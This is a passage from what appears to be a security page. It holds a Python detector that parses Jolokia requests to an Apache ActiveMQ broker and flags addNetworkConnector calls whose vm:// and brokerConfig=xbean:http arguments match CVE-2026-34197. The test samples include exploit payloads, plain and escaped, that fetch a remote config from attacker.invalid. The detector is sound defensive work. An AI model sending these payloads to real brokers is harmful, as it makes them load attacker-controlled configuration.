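    return unquote(segment).replace("!/", "/").replace("!!", "!")


def exec_from_get(path: str) -> Optional[Dict[str, Any]]:
    """Parse /api/jolokia/exec/<mbean>/<operation>/<arg>... into a request dict, or None if not an exec call."""
    if not path.startswith(EXEC_PATH_PREFIX):
        return None
    segments = re.split(r"(?<!!)/", path[len(EXEC_PATH_PREFIX):])  # never split on the escaped '!/'
    if len(segments) < 2:
        return None
    mbean, operation, *args = (_unescape_segment(s) for s in segments)
    return {"type": "exec", "mbean": mbean, "operation": operation, "arguments": args}


def execs_from_post(body: str) -> List[Dict[str, Any]]:
    """Jolokia accepts one request object or a list of them; keep only the exec requests."""
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        return []
    requests = parsed if isinstance(parsed, list) else [parsed]
    return [r for r in requests if isinstance(r, dict) and str(r.get("type", "")).lower() == "exec"]


def is_exploit_attempt(request: Dict[str, Any]) -> bool:
    """addNetworkConnector with a vm:// or brokerConfig=xbean:http argument is the CVE-2026-34197 shape."""
    operation = str(request.get("operation", ""))
    if not operation.startswith("addNetworkConnector"):
        return False
    return any(SUSPICIOUS_ARGUMENT.search(str(arg)) for arg in request.get("arguments", []))


def scan(requests: List[Tuple[str, str, str]]) -> List[Tuple[int, str]]:
    """Input: (method, path, body) per request. Output: (index, offending argument) for each hit."""
    hits = []
    for idx, (method, path, body) in enumerate(requests):
        candidates = execs_from_post(body) if method == "POST" else [r for r in [exec_from_get(path)] if r]
        for req in candidates:
            if is_exploit_attempt(req):
                hits.append((idx, next(str(a) for a in req["arguments"] if SUSPICIOUS_ARGUMENT.search(str(a)))))
                break
    return hits


BROKER = "org.apache.activemq:type=Broker,brokerName=localhost"
SAMPLE_REQUESTS = [
    ("POST", "/api/jolokia/", json.dumps({"type": "exec", "mbean": BROKER,
        "operation": "addNetworkConnector(java.lang.String)",
        "arguments": ["vm://x?brokerConfig=xbean:http://attacker.invalid/evil.xml"]})),
    ("POST", "/api/jolokia/", json.dumps({"type": "read", "mbean": BROKER, "attribute": "TotalMessageCount"})),
    ("POST", "/api/jolokia/", json.dumps({"type": "exec", "mbean": BROKER, "operation": "addNetworkConnector",
        "arguments": ["static:(tcp://broker2.example.internal:61616)"]})),  # legitimate peer link
    ("GET", "/api/jolokia/exec/" + BROKER
        + "/addNetworkConnector/vm:!/!/x%3FbrokerConfig=xbean:http:!/!/attacker.invalid!/evil.xml", ""),
]

if __name__ == "__main__":
    for idx, argument in scan(SAMPLE_REQUESTS):
        print(f"request {idx}: suspicious addNetworkConnector argument {argument}")
```

Matching on the decoded argument rather than on the raw URL matters: the GET form above carries no literal `vm://` until the `!/` escapes and the `%3F` are undone, so a plain substring rule on the request line would miss it.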
Frequently Asked Questions
What is the current A.I Rankiteo Cyber Score for ASF?
What was ASF's A.I Rankiteo Cyber Score in May 2026?
What was ASF's A.I Rankiteo Cyber Score in April 2026?
What was ASF's A.I Rankiteo Cyber Score in March 2026?
What was ASF's A.I Rankiteo Cyber Score in February 2026?
What was ASF's A.I Rankiteo Cyber Score in January 2026?
What was ASF's A.I Rankiteo Cyber Score in December 2025?
What was ASF's A.I Rankiteo Cyber Score in November 2025?
What was ASF's A.I Rankiteo Cyber Score in October 2025?
What was ASF's A.I Rankiteo Cyber Score in September 2025?
What was ASF's A.I Rankiteo Cyber Score in August 2025?
What was ASF's A.I Rankiteo Cyber Score in July 2025?
What is the average per-incident point impact on ASF's A.I Rankiteo Cyber Score over the past 12 months?
Where can I access detailed records of all cyber incidents associated with ASF?
Where can I find a summary of the A.I Rankiteo Risk Scoring methodology?
Where can I view ASF's profile page on Rankiteo?
How accurate is the A.I Rankiteo Risk Scoring methodology?